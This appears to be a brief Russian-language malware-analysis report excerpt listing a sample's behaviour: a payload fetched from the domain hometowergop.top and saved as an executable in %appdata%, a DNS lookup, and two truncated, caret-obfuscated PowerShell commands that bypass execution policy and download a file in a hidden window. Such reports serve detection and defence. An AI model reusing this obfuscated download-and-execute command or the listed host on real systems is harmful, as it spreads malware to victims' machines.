Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^WErSh^ELl^.eXE -EXE^C^UTioNPOL^icY^ BY^Pass ^-nO^p^roFi^Le ^-W^I^nDOWSTyle^ ^HI^ddEN^ ^(^n^E^w-o^bjEct s^y^stem^.NEt^.wEbcL^ieN^t).d^OwNL^oAd^F^iL^E('http://hometowergop.top...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "P^o^WErSh^ELl^.eXE -EXE^C^UTioNPOL^icY^ BY^Pass ^-nO^p^roFi^Le ^-W^I^nDOWSTyle^ ^HI^ddEN^ ^(^n^E^w-o^bjEct s^y^stem^.NEt^.wEbcL^ieN^t).d^OwNL^oAd^F^iL^E('http://hometowergop.top...' (со скрытым окном)